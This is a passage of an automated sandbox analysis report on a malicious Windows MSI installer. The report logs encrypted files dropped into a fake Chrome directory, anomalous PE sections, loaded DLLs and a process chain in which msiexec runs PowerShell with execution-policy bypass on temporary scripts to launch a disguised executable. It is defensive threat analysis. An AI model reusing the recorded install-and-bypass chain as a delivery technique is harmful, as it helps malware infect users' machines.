                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.97 entropy: 7.99366192441Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.98 entropy: 7.99841208592Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.99 entropy: 7.99474767769Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.124 entropy: 7.99782036754Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.125 entropy: 7.99790353721Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.126 entropy: 7.99795396183Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.127 entropy: 7.99819061954Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.128 entropy: 7.99578707328Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.129 entropy: 7.99767920118Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.13 entropy: 7.99555057257Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.130 entropy: 7.99448073439Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.131 entropy: 7.99785714597Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.132 entropy: 7.99495719328Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.133 entropy: 7.99787043835Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.134 entropy: 7.99409008648Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14 entropy: 7.99685420083Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.15 entropy: 7.99814258165Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.16 entropy: 7.99514210593Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.17 entropy: 7.99802992616Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.18 entropy: 7.99426880008Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.19 entropy: 7.99804200099Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.2 entropy: 7.99839321454Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.20 entropy: 7.99482421893Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.21 entropy: 7.99819014746Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.22 entropy: 7.99506507103Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.23 entropy: 7.99805207356Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.24 entropy: 7.99355397795Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.25 entropy: 7.99713455209Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.26 entropy: 7.9975483379Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.27 entropy: 7.99500009348Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.28 entropy: 7.99787066785Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.29 entropy: 7.9932411667Jump to dropped file
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeFile created: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.3 entropy: 7.997978048Jump to dropped file

                  System Summary

                  barindex
                  Source: chrome_elf.dll.6.drStatic PE information: section name: .Qg}
                  Source: chrome_elf.dll.6.drStatic PE information: section name: .zJ\
                  Source: chrome_elf.dll.6.drStatic PE information: section name: .'i+
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\53e56a.msiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE6C2.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE740.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE770.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE790.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE7DF.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipiJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{4433395F-681D-4D29-AC5B-870AC8B40C57}Jump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIE83E.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSIED31.tmpJump to behavior
                  Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIE6C2.tmpJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002BC0E86_2_00007FFE002BC0E8
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0028E8D06_2_00007FFE0028E8D0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002A11206_2_00007FFE002A1120
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002B69A06_2_00007FFE002B69A0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002A4A106_2_00007FFE002A4A10
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002ABA606_2_00007FFE002ABA60
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0028FA606_2_00007FFE0028FA60
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002A52906_2_00007FFE002A5290
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0028B2C86_2_00007FFE0028B2C8
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE00296B3C6_2_00007FFE00296B3C
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002B33006_2_00007FFE002B3300
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0029B3A06_2_00007FFE0029B3A0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002924306_2_00007FFE00292430
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002964646_2_00007FFE00296464
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE00299C506_2_00007FFE00299C50
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002A2CA06_2_00007FFE002A2CA0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002BAD0C6_2_00007FFE002BAD0C
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0029C5006_2_00007FFE0029C500
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0029D6606_2_00007FFE0029D660
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002A4E506_2_00007FFE002A4E50
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002BFEBA6_2_00007FFE002BFEBA
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0028C6B06_2_00007FFE0028C6B0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002A16806_2_00007FFE002A1680
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002A77146_2_00007FFE002A7714
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002A5F406_2_00007FFE002A5F40
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002967BC6_2_00007FFE002967BC
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0028D7B06_2_00007FFE0028D7B0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002997A06_2_00007FFE002997A0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002B57E06_2_00007FFE002B57E0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002BC7E06_2_00007FFE002BC7E0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002AAFD06_2_00007FFE002AAFD0
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002BA0386_2_00007FFE002BA038
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002B50106_2_00007FFE002B5010
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0029E8106_2_00007FFE0029E810
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE002B38086_2_00007FFE002B3808
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE133072386_2_00007FFE13307238
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCDEA007_2_00007FF74CCDEA00
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CC4A6007_2_00007FF74CC4A600
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CC7A2007_2_00007FF74CC7A200
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCE6DB07_2_00007FF74CCE6DB0
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCA95C07_2_00007FF74CCA95C0
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CC405707_2_00007FF74CC40570
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CC4B5607_2_00007FF74CC4B560
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCE91907_2_00007FF74CCE9190
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CC369407_2_00007FF74CC36940
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CD19AE07_2_00007FF74CD19AE0
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CC3DB107_2_00007FF74CC3DB10
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCDCAB07_2_00007FF74CCDCAB0
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCC42D07_2_00007FF74CCC42D0
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCE16D07_2_00007FF74CCE16D0
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CD6F67C7_2_00007FF74CD6F67C
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CD21E807_2_00007FF74CD21E80
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CD316407_2_00007FF74CD31640
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CC8CE507_2_00007FF74CC8CE50
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCD38107_2_00007FF74CCD3810
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCF84107_2_00007FF74CCF8410
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCE1F807_2_00007FF74CCE1F80
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CC817507_2_00007FF74CC81750
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CCE78C07_2_00007FF74CCE78C0
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.14 6B3265B2F82E206BED8B6CD56C2A3F0FA9D8FD027E19A9713DA618B177D9264B
                  Source: Joe Sandbox ViewDropped File: C:\ProgramData\Chrome\Application\118.0.5993.120\Extensions\external_extensions_0000x.50 34397DE1D9DC94AAA08CA1D267B64B0E12CCABA008BABE6F592E563F00DC874B
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: String function: 00007FF74CD94000 appears 188 times
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7480 -s 576
                  Source: chrome.exe.6.drStatic PE information: Number of sections : 12 > 10
                  Source: chrome_pwa_launcher.exe.6.drStatic PE information: Number of sections : 13 > 10
                  Source: chrome_elf.dll.6.drStatic PE information: Number of sections : 14 > 10
                  Source: 2024.0198840 298135.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs 2024.0198840 298135.msi
                  Source: 2024.0198840 298135.msiBinary or memory string: OriginalFilenamePowerShellScriptLauncher.dllF vs 2024.0198840 298135.msi
                  Source: chrome_elf.dll.6.drStatic PE information: Section: .Qg} ZLIB complexity 1.0001971347540288
                  Source: chrome.exe.6.drBinary string: \Device\DeviceApi
                  Source: chrome.exe.6.drBinary string: PathSystemDriveSystemRootTEMPTMPCHROME_CRASHPAD_PIPE_NAMEprocessIdtaglockdownLeveljobLeveldesiredIntegrityLeveldesiredMitigationsplatformMitigationscomponentFiltersappContainerSidappContainerCapabilitiesappContainerInitialCapabilitieslowboxSidpolicyRulesdisabledenableddisconnectCsrsszeroAppShimhandlesToCloseLockdownLimitedInteractiveRestricted Same AccessRestricted Non AdminLimited UserUnprotectedS-1-16-16384 SystemS-1-16-12288 HighS-1-16-8192 MediumS-1-16-6144 Medium LowS-1-16-4096 LowS-1-16-2048 Below LowS-1-16-0 Untrusted%016llx%016llx%016llx%08lxp[%d] == %xp[%d] == %pp[%d] & %x(p[%d], '%ls')exactprefixscanendsaskBrokerdenyalarmfakeSuccessfakeDeniedUnusedPing1Ping2NtOpenFileNtSetInfoRenameGdiDllInitializeGetStockObjectRegisterClassW*\windows_shell_global_counters\Device\DeviceApi\Device\KsecDDALPC Port
                  Source: chrome.exe.6.drBinary string: \??\pipe\\\.\\Device\\Device\HarddiskVolume\Device\\/?/?\\??\ntdll.dllntdll.dllNtOpenProcessNtOpenProcessTokenNtSetInformationThreadNtOpenThreadTokenNtOpenThreadTokenExkernel32.dll
                  Source: chrome.exe.6.drBinary string: \Device\KsecDD
                  Source: chrome.exe, 00000007.00000002.1999814359.0000000065029000.00000008.00000001.01000000.0000000B.sdmpBinary or memory string: quB.vBPvB
                  Source: classification engineClassification label: mal88.rans.troj.evad.winMSI@12/187@1/1
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeCode function: 7_2_00007FF74CDB7440 FormatMessageW,GetLastError,LocalFree,7_2_00007FF74CDB7440
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeCode function: 6_2_00007FFE0028A690 GetDiskFreeSpaceExW,_invalid_parameter_noinfo_noreturn,6_2_00007FFE0028A690
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CMLE933.tmpJump to behavior
                  Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7480
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
                  Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\TEMP\~DF15122D898C7AD262.TMPJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\2024.0198840 298135.msi"
                  Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 42DBD1ADE5F4EAE9CD74EFE76BAFFA98
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe "C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe"
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeProcess created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe
                  Source: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 7480 -s 576
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 42DBD1ADE5F4EAE9CD74EFE76BAFFA98Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pssEDDB.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msiEDC7.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scrEDC8.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scrEDC9.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe "C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\gerenciador_do_trabalhador\WebExperienceHostApp.exeProcess created: C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exe C:\ProgramData\Chrome\Application\118.0.5993.120\chrome.exeJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
